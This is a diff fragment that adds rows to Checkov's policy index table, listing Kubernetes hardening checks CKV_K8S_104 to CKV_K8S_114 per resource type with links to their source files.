+| 3447 | CKV_K8S_104              | resource                         | DeploymentConfig                                                                                 | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3448 | CKV_K8S_104              | resource                         | Job                                                                                              | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3449 | CKV_K8S_104              | resource                         | Pod                                                                                              | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3450 | CKV_K8S_104              | resource                         | PodTemplate                                                                                      | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3451 | CKV_K8S_104              | resource                         | ReplicaSet                                                                                       | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3452 | CKV_K8S_104              | resource                         | ReplicationController                                                                            | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3453 | CKV_K8S_104              | resource                         | StatefulSet                                                                                      | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3454 | CKV_K8S_105              | resource                         | CronJob                                                                                          | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3455 | CKV_K8S_105              | resource                         | DaemonSet                                                                                        | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3456 | CKV_K8S_105              | resource                         | Deployment                                                                                       | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3457 | CKV_K8S_105              | resource                         | DeploymentConfig                                                                                 | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3458 | CKV_K8S_105              | resource                         | Job                                                                                              | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3459 | CKV_K8S_105              | resource                         | Pod                                                                                              | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3460 | CKV_K8S_105              | resource                         | PodTemplate                                                                                      | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3461 | CKV_K8S_105              | resource                         | ReplicaSet                                                                                       | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3462 | CKV_K8S_105              | resource                         | ReplicationController                                                                            | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3463 | CKV_K8S_105              | resource                         | StatefulSet                                                                                      | Ensure that the API Server only makes use of Strong Cryptographic Ciphers                                                                                                                                | Kubernetes              | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py)                                                        |
+| 3464 | CKV_K8S_106              | resource                         | CronJob                                                                                          | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3465 | CKV_K8S_106              | resource                         | DaemonSet                                                                                        | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3466 | CKV_K8S_106              | resource                         | Deployment                                                                                       | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3467 | CKV_K8S_106              | resource                         | DeploymentConfig                                                                                 | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3468 | CKV_K8S_106              | resource                         | Job                                                                                              | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3469 | CKV_K8S_106              | resource                         | Pod                                                                                              | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3470 | CKV_K8S_106              | resource                         | PodTemplate                                                                                      | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3471 | CKV_K8S_106              | resource                         | ReplicaSet                                                                                       | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3472 | CKV_K8S_106              | resource                         | ReplicationController                                                                            | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3473 | CKV_K8S_106              | resource                         | StatefulSet                                                                                      | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate                                                                                                                             | Kubernetes              | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py)                                                        |
+| 3474 | CKV_K8S_107              | resource                         | CronJob                                                                                          | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3475 | CKV_K8S_107              | resource                         | DaemonSet                                                                                        | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3476 | CKV_K8S_107              | resource                         | Deployment                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3477 | CKV_K8S_107              | resource                         | DeploymentConfig                                                                                 | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3478 | CKV_K8S_107              | resource                         | Job                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3479 | CKV_K8S_107              | resource                         | Pod                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3480 | CKV_K8S_107              | resource                         | PodTemplate                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3481 | CKV_K8S_107              | resource                         | ReplicaSet                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3482 | CKV_K8S_107              | resource                         | ReplicationController                                                                            | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3483 | CKV_K8S_107              | resource                         | StatefulSet                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py)                                                          |
+| 3484 | CKV_K8S_108              | resource                         | CronJob                                                                                          | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3485 | CKV_K8S_108              | resource                         | DaemonSet                                                                                        | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3486 | CKV_K8S_108              | resource                         | Deployment                                                                                       | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3487 | CKV_K8S_108              | resource                         | DeploymentConfig                                                                                 | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3488 | CKV_K8S_108              | resource                         | Job                                                                                              | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3489 | CKV_K8S_108              | resource                         | Pod                                                                                              | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3490 | CKV_K8S_108              | resource                         | PodTemplate                                                                                      | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3491 | CKV_K8S_108              | resource                         | ReplicaSet                                                                                       | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3492 | CKV_K8S_108              | resource                         | ReplicationController                                                                            | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3493 | CKV_K8S_108              | resource                         | StatefulSet                                                                                      | Ensure that the --use-service-account-credentials argument is set to true                                                                                                                                | Kubernetes              | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py)                                  |
+| 3494 | CKV_K8S_110              | resource                         | CronJob                                                                                          | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3495 | CKV_K8S_110              | resource                         | DaemonSet                                                                                        | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3496 | CKV_K8S_110              | resource                         | Deployment                                                                                       | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3497 | CKV_K8S_110              | resource                         | DeploymentConfig                                                                                 | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3498 | CKV_K8S_110              | resource                         | Job                                                                                              | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3499 | CKV_K8S_110              | resource                         | Pod                                                                                              | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3500 | CKV_K8S_110              | resource                         | PodTemplate                                                                                      | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3501 | CKV_K8S_110              | resource                         | ReplicaSet                                                                                       | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3502 | CKV_K8S_110              | resource                         | ReplicationController                                                                            | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3503 | CKV_K8S_110              | resource                         | StatefulSet                                                                                      | Ensure that the --service-account-private-key-file argument is set as appropriate                                                                                                                        | Kubernetes              | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py)                            |
+| 3504 | CKV_K8S_111              | resource                         | CronJob                                                                                          | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3505 | CKV_K8S_111              | resource                         | DaemonSet                                                                                        | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3506 | CKV_K8S_111              | resource                         | Deployment                                                                                       | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3507 | CKV_K8S_111              | resource                         | DeploymentConfig                                                                                 | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3508 | CKV_K8S_111              | resource                         | Job                                                                                              | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3509 | CKV_K8S_111              | resource                         | Pod                                                                                              | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3510 | CKV_K8S_111              | resource                         | PodTemplate                                                                                      | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3511 | CKV_K8S_111              | resource                         | ReplicaSet                                                                                       | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3512 | CKV_K8S_111              | resource                         | ReplicationController                                                                            | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3513 | CKV_K8S_111              | resource                         | StatefulSet                                                                                      | Ensure that the --root-ca-file argument is set as appropriate                                                                                                                                            | Kubernetes              | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py)                                                                |
+| 3514 | CKV_K8S_112              | resource                         | CronJob                                                                                          | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3515 | CKV_K8S_112              | resource                         | DaemonSet                                                                                        | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3516 | CKV_K8S_112              | resource                         | Deployment                                                                                       | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3517 | CKV_K8S_112              | resource                         | DeploymentConfig                                                                                 | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3518 | CKV_K8S_112              | resource                         | Job                                                                                              | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3519 | CKV_K8S_112              | resource                         | Pod                                                                                              | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3520 | CKV_K8S_112              | resource                         | PodTemplate                                                                                      | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3521 | CKV_K8S_112              | resource                         | ReplicaSet                                                                                       | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3522 | CKV_K8S_112              | resource                         | ReplicationController                                                                            | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3523 | CKV_K8S_112              | resource                         | StatefulSet                                                                                      | Ensure that the RotateKubeletServerCertificate argument is set to true                                                                                                                                   | Kubernetes              | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py)                                                                  |
+| 3524 | CKV_K8S_113              | resource                         | CronJob                                                                                          | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3525 | CKV_K8S_113              | resource                         | DaemonSet                                                                                        | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3526 | CKV_K8S_113              | resource                         | Deployment                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3527 | CKV_K8S_113              | resource                         | DeploymentConfig                                                                                 | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3528 | CKV_K8S_113              | resource                         | Job                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3529 | CKV_K8S_113              | resource                         | Pod                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3530 | CKV_K8S_113              | resource                         | PodTemplate                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3531 | CKV_K8S_113              | resource                         | ReplicaSet                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3532 | CKV_K8S_113              | resource                         | ReplicationController                                                                            | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3533 | CKV_K8S_113              | resource                         | StatefulSet                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                                      |
+| 3534 | CKV_K8S_114              | resource                         | CronJob                                                                                          | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3535 | CKV_K8S_114              | resource                         | DaemonSet                                                                                        | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3536 | CKV_K8S_114              | resource                         | Deployment                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3537 | CKV_K8S_114              | resource                         | DeploymentConfig                                                                                 | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
